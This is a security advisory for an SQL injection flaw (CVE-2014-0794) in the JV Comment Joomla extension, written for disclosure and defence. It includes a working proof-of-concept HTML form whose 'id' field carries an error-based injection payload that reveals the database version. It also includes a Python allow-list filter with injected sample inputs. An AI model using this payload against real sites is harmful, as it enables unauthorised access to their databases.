High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in the JV Comment Joomla extension, which can be exploited to perform SQL injection attacks.
- SQL Injection in JV Comment Joomla Extension: CVE-2014-0794
The vulnerability exists due to insufficient validation of the "id" HTTP POST parameter passed to the "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.
The following exploitation example displays the version of the MySQL database:
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task" value="comment.like">
<input type="hidden" name="id" value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>
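The missing check on "id" can be expressed as a strict allow-list filter placed in front of the application. The following is an added example, not code from the advisory or from the extension: the function name `check_jvcomment_post`, the digit limit and the sample request bodies are all assumptions made for illustration, and it assumes a legitimate comment id is a plain positive integer.

```python
from urllib.parse import parse_qs

# Assumption: a legitimate comment id is a short positive decimal integer.
MAX_ID_DIGITS = 10


def check_jvcomment_post(body: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a urlencoded POST body sent to /index.php."""
    # keep_blank_values=True so an empty id is inspected, not silently dropped.
    params = parse_qs(body, keep_blank_values=True)

    # Inspect the request if any copy of "option" names the affected component.
    if "com_jvcomment" not in params.get("option", []):
        return True, "not com_jvcomment"

    ids = params.get("id")
    if ids is None:
        return True, "no id parameter"
    # Repeated parameters: a filter and PHP may disagree on which copy wins.
    if len(ids) != 1:
        return False, "id supplied more than once"

    value = ids[0]
    # ASCII digits only: rejects spaces, signs, operators, quotes, comments
    # and non-ASCII digit characters that str.isdigit() alone would accept.
    if not (value.isascii() and value.isdigit()):
        return False, "id is not a plain integer"
    if len(value) > MAX_ID_DIGITS:
        return False, "id too long"
    return True, "ok"


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "option=com_jvcomment&task=comment.like&id=42",
    "option=com_jvcomment&task=comment.like&id=1+AND+1%3D1",
    "option=com_jvcomment&task=comment.like&id=1&id=2",
    "option=com_jvcomment&task=comment.like&id=%EF%BC%91",
    "option=com_content&id=7",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_jvcomment_post(sample), sample)
```

The filter only sees the POST body; if the deployment also accepts these parameters in the URL query string, pass the merged parameters through the same check.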